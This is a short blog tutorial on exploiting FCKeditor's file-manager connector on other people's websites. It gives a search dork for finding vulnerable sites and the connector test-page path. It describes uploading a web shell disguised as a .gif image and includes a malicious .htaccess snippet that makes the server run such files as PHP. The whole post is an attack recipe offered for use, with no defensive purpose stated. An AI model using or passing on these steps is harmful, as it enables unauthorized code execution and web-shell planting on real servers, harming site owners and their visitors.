Exploiting a FCKeditOr.
What you will need:
1) Modified .htaccess (Code is below)
2) Shell in name_php.gif format
3) Site with FCKeditor
Chapter I - Collecting vulnerable site
It's easy to dork one.
Simple dork:
Code:
inurl:fckeditor intitle:Connectors Test
When you found a site navigate to the:
Code:
/fckeditor/editor/filemanager/browser/default/connectors/test.html
Code:
[URL='http://www.site.com/fckeditor/']http://www.site.com/fckeditor/
You add
Code:
editor/filemanager/browser/default/connectors/test.html
Now here comes exploiting.
Chapter II - Exploiting
Select "PHP" from the top left drop menu and click "Get folders" if it comes up with this:
It means Connector is enabled and working.
Next thing you want to do is to create a new folder.
When you created that click on "Get folders" again to check if it exists.
Open up notepad and paste you shell source in it.
Save it as shell_php.gif.
In current folder field enter your new folder (My case is tutorial-haxor) and press "Get folders" again.
Now just upload .htaccess and shell_php.gif
Just access your shell:
And thats it.
I hope you enjoyed this little tutorial.
Thanks for reading!
1) .htaccess code:
Code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
Tags: Fckeditor
Subscribe to:
Post Comments (Atom)
Share your views...
0 Respones to "Exploiting a FCKeditOr."
Post a Comment